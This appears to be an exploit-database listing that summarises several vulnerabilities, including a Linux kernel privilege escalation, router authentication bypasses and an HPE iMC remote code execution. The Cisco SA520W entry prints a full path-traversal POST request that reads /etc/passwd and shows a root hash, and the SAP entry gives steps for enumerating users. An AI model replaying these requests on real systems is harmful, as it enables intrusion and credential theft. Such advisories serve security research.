Explore Vulnerabilities

Explore all Exploits:

Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass Local Buffer Overflow

Easy MPEG to DVD Burner 1.7.11 is vulnerable to a local buffer overflow. The vulnerability is due to a boundary error when handling user-supplied input passed to the application: a specially crafted input causes a stack-based buffer overflow, which can be exploited by a malicious user to execute arbitrary code on the affected system with the privileges of the user running the application.

D-Link DSL 3782 – Authentication Bypass

The web panel of D-Link DSL 3782 version (A1_WI_20170303) does not issue a token ID (e.g. a session cookie) that identifies the logged-in administrator, but relies only on a server-side timeout that lasts a few minutes. In addition, a server-side mitigation prompts for login credentials every time the webroot is loaded, but leaves the application endpoints unprotected and affected by this authentication bypass. Therefore, after a valid administrator login, the web panel does not distinguish valid HTTP requests from the admin from those that come from other users. This way, an attacker can script an automatic routine that performs unwanted actions such as arbitrary modifications to router and SSID passwords and configurations.

AF_PACKET packet_set_ring Privilege Escalation

This module exploits a heap out-of-bounds write in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2017-7308). The bug was initially introduced in 2011 and patched in version 4.10.6, potentially affecting a large number of kernels; however, this exploit targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46, including Linux distros based on Ubuntu Xenial, such as Linux Mint. The target system must have unprivileged user namespaces enabled and two or more CPU cores. Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation may crash the kernel. This module has been tested successfully on Linux Mint 18 (x86_64) with kernel versions: 4.8.0-34-generic; 4.8.0-36-generic; 4.8.0-39-generic; 4.8.0-41-generic; 4.8.0-42-generic; 4.8.0-44-generic; 4.8.0-45-generic.

Chakra InvariantBlockBackwardIterator Class Vulnerability

Chakra uses the InvariantBlockBackwardIterator class to backpropagate information about hoisted bound checks. However, the class follows the linked list of blocks instead of the control flow. This may lead to bound checks being incorrectly removed, resulting in an out-of-bounds read vulnerability.

DynoRoot DHCP – Client Command Injection

DynoRoot is a DHCP client command injection vulnerability that affects RHEL 6.x / 7.x and CentOS 6.x / 7.x. It allows an attacker to inject arbitrary commands into a vulnerable DHCP client by sending a malicious DHCP response. The vulnerability was discovered by Felix Wilhelm and an exploit was developed by Kevin Kirsche.

Cisco SA520W Security Appliance – Path Traversal

Cisco SA 500 Series Security Appliances are designed for businesses with fewer than 100 employees. An attacker can exploit a path traversal vulnerability in the Cisco SA520W Security Appliance to read the /etc/passwd file. The vulnerable parameter is 'thispage' and the payload is '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00index.htm'. The request type is POST, and the request is 'POST /scgi-bin/platform.cgi HTTP/1.1 Host: host-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: https://70.186.255.169/scgi-bin/platform.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 311 Connection: close Upgrade-Insecure-Requests: 1 thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00index.htm&SSLVPNUser.UserName=admin&SSLVPNUser.Password=admin&button.login.routerStatus=Log+In&Login.userAgent=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A58.0%29+Gecko%2F20100101+Firefox%2F58.0'. The response is 'HTTP/1.0 200 OK Date: Sat, 01 Jan 2000 00:00:41 GMT Server: Embedded HTTP Server. Connection: close root:$1$omdZQoH8$bFOOjhl.E7BKKzvW/bRJe0:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/nonexistent:/bin/false'.

HPE iMC EL Injection Unauthenticated RCE

This module exploits an expression language injection vulnerability, along with an authentication bypass vulnerability, in Hewlett Packard Enterprise Intelligent Management Center before version 7.3 E0504P04 to achieve remote code execution. The HP iMC server suffers from multiple vulnerabilities that allow an unauthenticated attacker to execute arbitrary Expression Language via the beanName parameter, allowing execution of arbitrary operating system commands as SYSTEM. This service listens on TCP ports 8080 and 8443 by default.

SAP NetWeaver Web Dynpro – information disclosure (Enumerate users)

An anonymous attacker can use a special HTTP request to get information about SAP NetWeaver users. A potential attacker can use the vulnerability to reveal user names, first and last names, and associated emails; this can provide an attacker with enough information to make a more accurate and effective attack. Steps to exploit this vulnerability:
1. Open the http://SAP/webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/ACreate or http://SAP/webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/com.sap.caf.eu.gp.example.timeoff.wd.create.ACreate page on the SAP server.
2. Press the 'Change processor' button.
3. In the 'find' section, enter the initial or name to be searched, followed by a *.